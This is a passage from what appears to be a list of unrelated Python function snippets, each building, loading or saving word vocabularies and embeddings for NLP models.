int(sline[1])\n\t\t\t\t\t\tvectors = sline[2:sense_num*c+2] # (sense_num*c+2)\n\t\t\t\t\t\tvector_list = []\n\t\t\t\t\t\tfor start in range(0, len(vectors), c):\n\t\t\t\t\t\t\tvector_list.append(list(map(float, vectors[start: start+c])))\n\t\t\t\t\t\tvector_array = np.array(vector_list)\n\t\t\t\t\t\tword_id = self.word2IdVocabulary[word]\n\t\t\t\t\t\tif not self.vectors.has_key(word_id):\n\t\t\t\t\t\t\tself.vectors[word_id] = vector_array\n\t\t\t\t\t\tvector_mean = np.mean(vector_array, axis=0)\n\t\t\t\t\t\tif not self.vector_mean.has_key(word_id):\n\t\t\t\t\t\t\tself.vector_mean[word_id] = vector_mean\n\t\t\t\t\t\t'''j = 0\n\t\t\t\t\t\tfor each_sense_vec in vector_array:\n\t\t\t\t\t\t\tif len(vector_array) > 1:\n\t\t\t\t\t\t\t\tnew_line = word + '_' + str(j) + ' ' + np.array2string(each_sense_vec, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tformatter={'float_kind': lambda x: '%6f' % x})[1:-1] + '\\n'\n\t\t\t\t\t\t\t\tj += 1\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tnew_line = word + ' ' + np.array2string(each_sense_vec, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formatter={'float_kind': 
lambda\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t x: '%6f' % x})[1:-1] + '\\n'\n\n\t\t\t\t\t\t\tvec_outfile.write(new_line)'''\n\n\t\twith codecs.open(self.doc_file, encoding='utf-8', mode='r') as docfile:\n\t\t\twith codecs.open(self.doc_out_file, encoding='utf-8', mode='a+') as doc_outfile:\n\t\t\t\twith codecs.open(self.vec_out_file_bydoc, encoding='utf-8', mode='a+') as vec_outfile_bydoc:\n\t\t\t\t\tprint \"Processing document file......\"\n\t\t\t\t\tline = docfile.readline().strip('\\n')\n\t\t\t\t\twhile line:\n\t\t\t\t\t\twords = line.split()\n\t\t\t\t\t\tnew_words = [x for x in words]\n\t\t\t\t\t\tfor i in range(len(words)):\n\t\t\t\t\t\t\tword_id = self.word2IdVocabulary[words[i]]\n\t\t\t\t\t\t\tsense_vecs = self.vectors[word_id]\n\t\t\t\t\t\t\tsense_num = len(sense_vecs)\n\t\t\t\t\t\t\tif sense_num > 1:\n\t\t\t\t\t\t\t\tcontext_words = []\n\t\t\t\t\t\t\t\tfor x in range(i-int(self.context_num), i+int(self.context_num)+1):\n\t\t\t\t\t\t\t\t\tif x != i and 0 <= x < len(words):\n\t\t\t\t\t\t\t\t\t\tcontext_words.append(words[x])\n\t\t\t\t\t\t\t\tsense_index = self.select_attention(context_words, sense_vecs)\n\t\t\t\t\t\t\t\tword_vec_i = sense_vecs[sense_index]\n\t\t\t\t\t\t\t\tnew_wordi = words[i] + '_' + str(sense_index)\n\t\t\t\t\t\t\t\tself.vector_word_doc[new_wordi.encode('utf-8')] = word_vec_i\n\t\t\t\t\t\t\t\tnew_words[i] = new_wordi\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tword_vec_i = sense_vecs[0]\n\t\t\t\t\t\t\t\tself.vector_word_doc[words[i].encode('utf-8')] = word_vec_i\n\t\t\t\t\t\t\tvec_outfile_bydoc.write(new_words[i] + ' ' + np.array2string(word_vec_i, max_line_width=2000,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t formatter={'float_kind': lambda x: '%6f' % x})[1:-1] + '\\n')\n\n\t\t\t\t\t\tdoc_outfile.write(' '.join(new_words) + '\\n')\n\n\t\t\t\t\t\tline = docfile.readline()\n\n\t\treturn self.vector_word_doc", "def _extract_vocab_data(source_files):\n vocab = set()\n\n for source_file in source_files:\n with tf.gfile.Open(source_file) as vocab_file:\n for line in vocab_file:\n tokens = line.split()\n vocab.update(tokens)\n\n return list(vocab)", "def build_vocabulary(self):\n \n for iCount in range(0,len(self.documents)):\n for jCount in range(iCount,len(self.documents[iCount])):\n self.vocabulary.append(self.documents[iCount][jCount])\n\n self.vocabulary = set(self.vocabulary)\n\t\t\n self.vocabulary = sorted(self.vocabulary)\n\t\t#print(\"Value of the vocabulary\")\n self.vocabulary_size = len(self.vocabulary)", "def load_vocabulary():\n global vocabulary_list, vocabulary_dict\n vocabulary_list = []\n vocabulary_dict = {}\n\n with open(_VOCABULARY_PATH, 'r') as f:\n for index, line in enumerate(f):\n line = line.strip()\n vocabulary_dict[line] = index\n vocabulary_list.append(line)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def _build_vocabulary(input_files):\n if FLAGS.vocab_file:\n tf.logging.info(\"Loading existing vocab file.\")\n vocab = collections.OrderedDict()\n with tf.gfile.GFile(FLAGS.vocab_file, mode=\"r\") as f:\n for i, line in enumerate(f):\n word = line.decode(\"utf-8\").strip()\n assert word not in vocab, \"Attempting to add word twice: %s\" % word\n vocab[word] = i\n tf.logging.info(\"Read vocab of size %d from %s\",\n len(vocab), FLAGS.vocab_file)\n return vocab\n\n tf.logging.info(\"Creating vocabulary.\")\n num = 0\n wordcount = collections.Counter()\n for input_file in input_files:\n tf.logging.info(\"Processing 
file: %s\", input_file)\n for sentence in tf.gfile.FastGFile(input_file):\n wordcount.update(sentence.split())\n\n num += 1\n if num % 1000000 == 0:\n tf.logging.info(\"Processed %d sentences\", num)\n\n tf.logging.info(\"Processed %d sentences total\", num)\n\n words = wordcount.keys()\n freqs = wordcount.values()\n sorted_indices = np.argsort(freqs)[::-1]\n\n vocab = collections.OrderedDict()\n vocab[special_words.EOS] = special_words.EOS_ID\n vocab[special_words.UNK] = special_words.UNK_ID\n for w_id, w_index in enumerate(sorted_indices[0:FLAGS.num_words - 2]):\n vocab[words[w_index]] = w_id + 2 # 0: EOS, 1: UNK.\n\n tf.logging.info(\"Created vocab with %d words\", len(vocab))\n\n vocab_file = os.path.join(FLAGS.output_dir, \"vocab.txt\")\n with tf.gfile.FastGFile(vocab_file, \"w\") as f:\n f.write(\"\\n\".join(vocab.keys()))\n tf.logging.info(\"Wrote vocab file to %s\", vocab_file)\n\n word_counts_file = os.path.join(FLAGS.output_dir, \"word_counts.txt\")\n with tf.gfile.FastGFile(word_counts_file, \"w\") as f:\n for i in sorted_indices:\n f.write(\"%s %d\\n\" % (words[i], freqs[i]))\n tf.logging.info(\"Wrote word counts file to %s\", word_counts_file)\n\n return vocab", "def load_preprocessed(self):\n with open(self.words_vocab_file, 'rb') as f:\n self.word_to_id, self.unk_word_list = pickle.load(f)\n self.word_vocab_size = len(self.word_to_id)\n\n if self.unit != \"word\":\n with open(self.sub_vocab_file, 'rb') as f:\n if self.unit == \"char\":\n self.max_word_len = self.get_max_word_length(self.word_to_id) + 2\n self.char_to_id, self.unk_char_list, self.max_word_len = pickle.load(f)\n self.subword_vocab_size = len(self.char_to_id)\n elif self.unit == \"char-ngram\":\n self.ngram_to_id, self.unk_char_list, self.unk_ngram_list, \\\n self.max_ngram_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.ngram_to_id)\n elif self.unit == \"morpheme\":\n self.morpheme_to_id, self.unk_char_list, self.unk_morph_list, \\\n self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n elif self.unit == \"oracle\":\n self.morpheme_to_id, self.max_morph_per_word = pickle.load(f)\n self.subword_vocab_size = len(self.morpheme_to_id)\n else:\n sys.exit(\"Unknown unit\")", "def vocab():\n symbols = DEFAULT_SPECIAL_SYMBOLS + [\"mouse\", \"dog\", \"tree\"]\n return Vocabulary(symbols)", "def load_vocab(self):\n keys = []\n values = []\n with open(self.embed_file, 'r') as f:\n lines = f.readlines()\n\n for line in lines:\n key = line.split(\" \")[0]\n value = line.split(\" \")[1:]\n keys.append(key)\n values.append(value)\n # form <dict>\n # vocab = dict(zip(keys, values))\n return keys, values", "def get_vocab():\n if data_dir is not None and vocab_filename is not None:\n vocab_filepath = os.path.join(data_dir, vocab_filename)\n if tf.gfile.Exists(vocab_filepath):\n tf.logging.info(\"Found vocab file: %s\", vocab_filepath)\n vocab_symbolizer = text_encoder.SubwordTextEncoder(vocab_filepath)\n return vocab_symbolizer\n else:\n raise ValueError(\"Vocab file does not exist: %s\" % vocab_filepath)\n return None", "def create_vocabulary(sentences, path):\n print('creating vocab..')\n\n word_dict = dict(); vocabulary = dict()\n for sentence in sentences:\n for word in nltk.word_tokenize(sentence):\n if word not in word_dict:\n word_dict[word] = ''\n word_dict['<s>'] = ''\n word_dict['</s>'] = ''\n\n with open(path, encoding=\"utf8\") as f:\n for line in f:\n word, vec = line.split(' ', 1)\n if word in word_dict:\n vocabulary[word] = np.fromstring(vec, sep=' ')\n\n 
print('vocabulary was created successfully!')\n return vocabulary", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv.append('<pad>')\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def get_vocab(data_set):\n vocab = {'PADDING': 0, 'PUNCT': 1}\n inv_vocab = {0: 'PADDING', 1: 'PUNCT'}\n wid = 2\n max_len = -1\n for record in data_set:\n assert 'words' in record\n words = record['words']\n if len(words) > max_len:\n max_len = len(words)\n for w in words:\n if w not in vocab:\n vocab[w] = wid\n inv_vocab[wid] = w\n wid += 1\n print(\"The maximum length of the sentence is %d\" % max_len)\n print(\"Find %s different words in the dataset\" % len(vocab))\n char_string = ''\n for w in vocab:\n char_string += w\n chars = list(set(char_string))\n cid, char_vocab = 0, {}\n for ch in chars:\n if ch not in char_vocab:\n char_vocab[ch] = cid\n cid += 1\n print(\"Find %s different chars in the dataset\" % len(char_vocab))\n return vocab, char_vocab, max_len", "def get_vocabulary(\n cfg: DatasetConfig) -> Tuple[seqio.Vocabulary, seqio.Vocabulary]:\n if cfg.module:\n warnings.warn(\n 'The use of `DatasetConfig.module` and `MIXTURE_OR_TASK_MODULE` is '\n 'deprecated in favor of importing the module directly or via gin.',\n DeprecationWarning)\n import_module(cfg.module)\n\n provider = seqio.get_mixture_or_task(cfg.mixture_or_task_name)\n features = provider.output_features\n\n if 'inputs' in features and 'targets' in features:\n return (features['inputs'].vocabulary, features['targets'].vocabulary)\n\n # If a mix of PassThroughVocabularies and other Vocabularies are specified,\n # use the non-PassThroughVocabularies.\n # TODO(b/185912004): Remove this once a more general solution is implemented.\n vocabularies = list(\n f.vocabulary\n for f in features.values()\n if not isinstance(f.vocabulary, seqio.PassThroughVocabulary))\n\n # Otherwise, if all of the vocabs are PassThroughVocabularies, use those.\n if not vocabularies:\n vocabularies = list(f.vocabulary for f in features.values())\n\n # If there still aren't any vocabularies, raise an error.\n if not vocabularies:\n raise ValueError('\"inputs\" and \"targets\" are not both present, and '\n 'no vocabularies were set for any features.')\n\n first_vocab = vocabularies[0]\n for vocab in vocabularies[1:]:\n if vocab != first_vocab:\n raise ValueError('\"inputs\" and \"targets\" are not both present, and '\n 'vocabularies are different.')\n return (first_vocab, first_vocab)", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def build_vocab(train_dir, vocab_dir, vocab_size=5000):\n data_train, _ = read_file(train_dir)\n\n all_data = []\n for content in data_train:\n all_data.extend(content)\n\n counter = Counter(all_data)\n count_pairs = counter.most_common(vocab_size-1)\n words, _ = list(zip(*count_pairs))\n\n open_file(vocab_dir,mode='w').write('\\n'.join(words)+'\\n')", "def getLearningData(corpus, vocab):\n labels, data = [], 
[]\n global importantFrequentWordDic\n for sent in corpus.trainingSents:\n trans = sent.initialTransition\n while trans and trans.next:\n tokenIdxs, posIdxs = getTransData(trans, vocab)\n data.append(np.asarray(np.concatenate((tokenIdxs, posIdxs))))\n labels.append(trans.next.type.value if trans.next.type.value <= 2 else (\n trans.next.type.value if enableCategorization else 3))\n trans = trans.next\n return labels, data", "def create_vocab(vocab_size):\n vocab_dict = tff.simulation.datasets.stackoverflow.load_word_counts(\n cache_dir='/tmp')\n return list(vocab_dict.keys())[:vocab_size]", "def build_dataset(words):\n count = []\n # count.extend(collections.Counter(words).most_common(n_words - 1))\n count.extend(collections.Counter(words).most_common())\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n # unk_count = 0\n for word in words:\n index = dictionary.get(word, 0)\n # if index == 0: # dictionary['UNK']\n # unk_count += 1\n data.append(index)\n # count[0][1] = unk_count\n reversed_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n data = [data[::2],data[1::2]]\n new_data = list()\n for i in range(len(data[0])):\n new_data.append([data[0][i],data[1][i]])\n data = new_data\n vocabulary_size = len(dictionary)\n print(\"\\n\\ndictionary size = \")\n print(len(dictionary))\n return data, count, dictionary, reversed_dictionary, vocabulary_size", "def build_words_dataset(words, vocabulary_size=50000, printable=True):\n import collections\n count = [['UNK', -1]]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n count[0][1] = unk_count\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n if printable:\n print('Real vocabulary size %d' % len(collections.Counter(words).keys()))\n print('Limited vocabulary size {}'.format(vocabulary_size))\n assert len(collections.Counter(words).keys()) >= vocabulary_size , \\\n \"Read vocabulary size can be less than limited vocabulary size\"\n return data, count, dictionary, reverse_dictionary", "def _load_vocabulary(self) -> Dict[str, int]:\n\n df_existing_vocab = self._db_connection.get_dataframe(table_name='tfidf_vocabulary', schema='encoded_articles')\n\n df_existing_vocab.set_index('word', inplace=True)\n\n return df_existing_vocab['feature_matrix_index'].to_dict()", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def getVocabList():\n vocabList = pd.read_csv(os.path.join(folder, 'vocab.txt'),\n delimiter='\\t',\n names=['index', 'vocab'],\n index_col='index')\n return vocabList", "def load_data():\n # Load and preprocess data\n x_text_train1, x_text_train2, x_text_dev1, x_text_dev2, y_train, y_dev = load_data_and_labels_without_shuffled()\n\n x_text_train1 = split_sentence(x_text_train1)\n x_text_train2 = split_sentence(x_text_train2)\n x_text_dev1 = split_sentence(x_text_dev1)\n x_text_dev2 = 
split_sentence(x_text_dev2)\n\n x_text_train1 = pad_sentences(x_text_train1)\n x_text_train2 = pad_sentences(x_text_train2)\n x_text_dev1 = pad_sentences(x_text_dev1)\n x_text_dev2 = pad_sentences(x_text_dev2)\n\n # sentences = x_text_train1 + x_text_train2 + x_text_dev1 + x_text_dev2\n # vocabulary, vocabulary_inv = build_vocab(sentences)\n # x_text_train1 = build_input_data(x_text_train1, vocabulary)\n # x_text_train2 = build_input_data(x_text_train2, vocabulary)\n # x_text_dev1 = build_input_data(x_text_dev1, vocabulary)\n # x_text_dev2 = build_input_data(x_text_dev2, vocabulary)\n\n x_train1 = sentence_word2vec(x_text_train1)\n x_train2 = sentence_word2vec(x_text_train2)\n x_dev1 = sentence_word2vec(x_text_dev1)\n x_dev2 = sentence_word2vec(x_text_dev2)\n\n y_train = np.array(y_train)\n y_dev = np.array(y_dev)\n # return [x_text_train1, x_text_train2, x_text_dev1, x_text_dev2, y_train, y_dev, vocabulary, vocabulary_inv]\n\n return [x_train1, x_train2, x_dev1, x_dev2, y_train, y_dev]", "def load_vocab(vocab):\r\n\tvocab = [line.split()[0] for line in open(\r\n\t\t'{}{}'.format(pm.vocab_path, vocab), 'r', encoding='utf-8').read().splitlines()\r\n\t\t\t if int(line.split()[1]) >= pm.word_limit_size]\r\n\tword2idx_dic = {word: idx for idx, word in enumerate(vocab)}\r\n\tidx2word_dic = {idx: word for idx, word in enumerate(vocab)}\r\n\treturn word2idx_dic, idx2word_dic", "def preprocess(self):\n self.word_to_id, self.unk_word_list = self.build_vocab(mode=\"word\")\n self.word_vocab_size = len(self.word_to_id)\n self.max_word_len = self.get_max_word_length(self.word_to_id)\n # Do not write the same file again\n if not os.path.exists(self.words_vocab_file):\n with open(self.words_vocab_file, 'wb') as f:\n pickle.dump((self.word_to_id, self.unk_word_list), f)\n if self.unit != \"word\":\n self.preprocess_sub_units()", "def build_vocab(vocab_size, text_vector):\n vocab = Counter()\n for text in text_vector:\n for word in text.split(' '):\n vocab[word.lower()]+=1\n vocab = dict(vocab.most_common(vocab_size))\n return vocab", "def vocab(self) -> Vocabulary:\n return self._model.vocab", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def tokenize_text(dataset):\n tokenizer = tfds.features.text.Tokenizer()\n vocabulary = set() # removes duplicates\n for _, reviews in dataset.enumerate():\n review_text = reviews['data']\n reviews_tokens = tokenizer.tokenize(review_text.get('review_body').numpy())\n # add to vocabulary set\n vocabulary.update(reviews_tokens)\n\n return vocabulary", "def build_vocab(data, min_token_instances, verbose=True):\r\n token_counter = Counter()\r\n print('Building vocab...')\r\n pbar = mmcv.ProgressBar(len(data))\r\n for img in data:\r\n for region in img['relationships']:\r\n if region['tokens'] is not None:\r\n token_counter.update(region['tokens'])\r\n pbar.update()\r\n\r\n vocab = set()\r\n for token, count in token_counter.items():\r\n if count >= min_token_instances:\r\n vocab.add(token)\r\n\r\n if verbose:\r\n print('\\n Keeping %d / %d tokens with enough instances'\r\n % (len(vocab), len(token_counter)))\r\n\r\n if len(vocab) < len(token_counter):\r\n vocab.add('<UNK>')\r\n if verbose:\r\n print('adding special <UNK> token.')\r\n else:\r\n if verbose:\r\n print('no <UNK> token needed.')\r\n print('VOCAB 
num: %s'%(len(vocab)))\r\n return vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def get_vocab(self):\n vocab, char_vocab = set(), set()\n\n for document in self.docs:\n vocab.update(document.tokens)\n char_vocab.update([char\n for word in document.tokens\n for char in word])\n\n return vocab, char_vocab", "def build_vocab(raw_data, max_size=None):\n data = [w for doc in tokenize_keras(raw_data) for w in doc]\n counter = collections.Counter(data)\n count_pairs = sorted(counter.items(),\n key=lambda x: (-x[1], x[0]))\n if max_size: count_pairs = count_pairs[:max_size]\n words, _ = list(zip(*count_pairs))\n word_to_id = dict(zip(words, range(len(words))))\n word_to_id[UNKNOWN_WORD] = len(word_to_id)\n word_to_id[PAD_WORD] = len(word_to_id)\n return word_to_id", "def get_vocab(data, nb_words=50000, min_nb=10, remove_stop_words = True):\n\n\n # Put everything into onw long string\n data = [item for sublist in list(data.values()) for item in sublist]\n data = \" \".join(data)\n\n # Do a bit of steaming\n data = remove_punctuations(data)\n vocab = Counter(data)\n\n # Remove the stop words\n new_vocab = vocab.copy()\n for key, value in vocab.items():\n if remove_stop_words and key in stopwords:\n del new_vocab[key]\n if value < min_nb:\n del new_vocab[key]\n\n vocab = new_vocab\n\n # Keep the most common words\n vocab = Counter(dict(vocab.most_common(nb_words)))\n\n # Extract a mapping\n mapping = {}\n mapping[1] = \"--UNK--\"\n mapping[\"--UNK--\"] = 1\n for i, word in enumerate(sorted(vocab.keys())):\n mapping[i + 2] = word\n mapping[word] = i + 2\n\n return vocab, mapping", "def create_vocab(input_iter, min_frequency):\n vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor(\n FLAGS.max_sentence_len,\n min_frequency=min_frequency,\n tokenizer_fn=tokenizer_fn)\n\n vocab_processor.fit(input_iter)\n return vocab_processor", "def load_data():\n # Load and preprocess data\n sentences, labels = load_data_and_labels()\n sentences_padded = pad_sentences(sentences)\n vocabulary, vocabulary_inv = build_vocab(sentences_padded)\n x, y = build_input_data(sentences_padded, labels, vocabulary)\n return [x, y, vocabulary, vocabulary_inv]", "def vocabfn(self):\n return Vocab(self.COMMON_ATOMS)", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def 
generate_vocabSet(original_data):\n education = convert_key(original_data, 'education')\n experience = convert_key(original_data, 'experience')\n header = convert_key(original_data, 'header')\n vocabSet = []\n vocabSet.append(education)\n vocabSet.append(experience)\n vocabSet.append(header)\n vocabSet = [y for i in vocabSet for y in i]\n vocabSet = list(set(vocabSet))\n return vocabSet", "def create_vocabulary(vocabulary_path, data_path, max_vocabulary_size,\n tokenizer=None, normalize_digits=True):\n if not gfile.Exists(vocabulary_path):\n print(\"Creating vocabulary %s from data %s\" % (vocabulary_path, data_path))\n vocab = {}\n with gfile.GFile(data_path, mode=\"r\") as f:\n counter = 0\n for line in f:\n counter += 1\n line = line.strip().split('\\t')[0]\n if counter % 100000 == 0:\n print(\" processing line %d\" % counter)\n tokens = tokenizer(line) if tokenizer else basic_tokenizer(line)\n for w in tokens:\n word = re.sub(_DIGIT_RE, \"0\", w) if normalize_digits else w\n if word in vocab:\n vocab[word] += 1\n else:\n vocab[word] = 1\n sorted_vocab = sorted(vocab, key=vocab.get, reverse=True)\n vocab_list = _START_VOCAB + sorted_vocab\n if len(vocab_list) > max_vocabulary_size:\n vocab_list = vocab_list[:max_vocabulary_size]\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), max_vocabulary_size, vocab[sorted_vocab[max_vocabulary_size - len(_START_VOCAB)]] ) )\n else:\n print(\"Corpus %s has %d tokens, %d uniq words, %d vocab at cutoff %d.\" % (\n data_path, sum(vocab.values()), len(vocab), len(vocab), 0))\n\n with gfile.GFile(vocabulary_path, mode=\"wb\") as vocab_file:\n for w in vocab_list:\n vocab_file.write(w + \"\\n\")", "def vocab(self: TokenMatcher) -> Vocab:\n return self._searcher.vocab", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common() if x[1] > 1]\n vocabulary_inv += ['$']\n vocabulary_inv = list(sorted(vocabulary_inv))\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def process_vocabulary(args, data, quiet=False):\n if not quiet:\n out(args.logfile, \"initializing vacabularies... 
\", end=\"\")\n seq_vocab = vocabulary.Vocabulary()\n bracket_vocab = vocabulary.Vocabulary()\n # loop_type_vocab = vocabulary.Vocabulary()\n\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n vocab.index(START)\n vocab.index(STOP)\n for x in data[:100]:\n seq = x[\"sequence\"]\n dot = x[\"structure\"]\n # loop = x[\"predicted_loop_type\"]\n for character in seq:\n seq_vocab.index(character)\n for character in dot:\n bracket_vocab.index(character)\n # for character in loop:\n # loop_type_vocab.index(character)\n for vocab in [seq_vocab, bracket_vocab]: # , loop_type_vocab]:\n # vocab.index(UNK)\n vocab.freeze()\n if not quiet:\n out(args.logfile, \"done.\")\n\n def print_vocabulary(name, vocab):\n # special = {START, STOP, UNK}\n special = {START, STOP}\n out(args.logfile, \"{}({:,}): {}\".format(\n name, vocab.size,\n sorted(value for value in vocab.values if value in special) +\n sorted(value for value in vocab.values if value not in special)))\n\n if not quiet:\n print_vocabulary(\"Sequence\", seq_vocab)\n print_vocabulary(\"Brackets\", bracket_vocab)\n return seq_vocab, bracket_vocab", "def load_vocab(fn):\n return corpora.Dictionary.load(fn)", "def get_weibo_data(vocab_file, vector_file):\n if os.path.exists(\"word_misc.pkl\"):\n return cPickle.load(open(\"word_misc.pkl\", \"rb\"))\n\n word_misc, word2id, id2word = {}, {}, {}\n word_count = 0\n\n # vocab file\n print \"Building vocabulary ...\"\n for lines in open(vocab_file).readlines():\n word = lines.split()[0]\n if not is_unwanted_words(word, ['', '\\n']):\n word2id[word] = word_count\n id2word[word_count] = word\n word_count += 1\n word2id['_START'] = word_count\n id2word[word_count] = '_START'\n word_count += 1\n word2id['_END'] = word_count\n id2word[word_count] = '_END'\n word_count += 1\n word2id['_UNK'] = word_count\n id2word[word_count] = '_UNK'\n word_count += 1\n word2id['_MASK'] = word_count\n id2word[word_count] = '_MASK'\n word_count += 1\n print \"Vocabulary size:\", word_count\n\n # Initialization is refered to in https://www.tensorflow.org/versions/r0.7/tutorials/word2vec/index.html\n word_emb = (1/np.sqrt(word_count)*(2*np.random.rand(word_count, options['embedding_size']) - 1)).tolist()\n\n # load word vectors\n for lines in open(vector_file).readlines()[1:]:\n word = lines.split()[0]\n #if word == '</s>' or word not in word2id.keys():\n # continue\n if word not in word2id.keys():\n continue\n ids = word2id[word]\n #print ids, lines, len(word_emb)\n word_emb[ids] = [float(w) for w in lines.split()[1:]]\n\n print len(word_emb), \"words have been loaded with\", len(word_emb[0]), \"dimensions\"\n\n # load word misc\n word_misc['id2word'] = id2word\n word_misc['word2id'] = word2id\n word_misc['word_count'] = word_count\n word_misc['word_emb'] = word_emb\n cPickle.dump(word_misc, open(\"word_misc.pkl\", \"wb\"))\n print \"Dump complete.\"\n return word_misc", "def create_vocab(df, datapath):\n if os.path.isfile(\"vocab_max_l.p\"):\n o = cPickle.load(open(\"vocab_max_l.p\", \"rb\")) # search if vocab file is already existing\n vocab = o[0]\n max_l = o[1]\n else:\n vocab = defaultdict(int)\n max_l = 0\n for d in read_data_files(df.file, datapath):\n words = clean_str(d).split(\" \")\n if len(words) > max_l:\n max_l = len(words)\n\n for w in words:\n vocab[w] += 1\n\n cPickle.dump([vocab, max_l], open(\"vocab_max_l.p\", \"wb\"))\n return vocab, max_l", "def _build_vocab(self, \n data_path : str,\n vocab_size: int=3500, \n unk_token : str=\"<UNK>\", \n pad_token : str=\"<PAD>\",\n mode : str=\"tokenize\",\n 
test : bool=False,\n vocab=None\n ): \n # read data form file\n sentences, labels, targets_list, word_counter = self._read_data(data_path, mode=mode, bert=True, task=self.task)\n\n # build vocabulary on data if none is given\n if vocab is None:\n print(\"\\n[dataset]: building vocabulary ...\")\n # load pretrained GloVe word embeddings\n glove_vec = torchtext.vocab.GloVe(name=\"6B\", dim=100, unk_init=torch.FloatTensor.normal_)\n self.vocabulary = Vocab(\n counter=word_counter, # (word,freq) mapping\n max_size=vocab_size, # vocabulary max size\n specials=[pad_token,unk_token], # special tokens\n vectors=glove_vec # pre-trained embeddings\n )\n # ensure pad_token embedding is a zeros tensor\n self.vocabulary.vectors[0] = torch.zeros([glove_vec.dim]).float()\n print(\"Embedding vectors:\", self.vocabulary.vectors.size())\n\n else:\n print(\"\\n[dataset]: (dev) using train vocabulary ...\")\n self.vocabulary = vocab\n\n # create data samples -> (x, y)\n self.samples = []\n\n if mode == \"tokenize\":\n for toks, tags, terms in zip(sentences,labels,targets_list):\n tokens_idxs = []\n for t in toks:\n try:\n idx = self.vocabulary.stoi[t]\n except:\n idx = self.vocabulary.stoi[unk_token]\n\n assert len(toks) == len(tags)\n tokens_idxs.append(idx)\n\n #print(toks, tags)\n self.samples.append((tokens_idxs,tags,toks,self._tokenize_line(terms)))\n\n elif mode == \"raw\":\n # use raw text as input (required by transformers)\n if not test:\n for s, l, tgt in zip(sentences,labels,targets_list):\n self.samples.append((s,l,tgt))\n else:\n for s, l, tgt, tok in zip(sentences,labels,targets_list, word_counter):\n self.samples.append((s,l,tgt,tok))\n return", "def save_vocabulary(self):\n out_vocab_file = 'xlnet_vocab.txt'\n if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):\n copyfile(self.vocab_file, out_vocab_file)\n\n return (out_vocab_file,)", "def vectorize_vocabulary(train_tweets_dict, test_tweets_dict):\n\n print(\"Vectorizing ADRMine data vocabulary...\")\n\n tfidf_vectorizer = TfidfVectorizer()\n corpus = []\n\n for i, (k, v) in 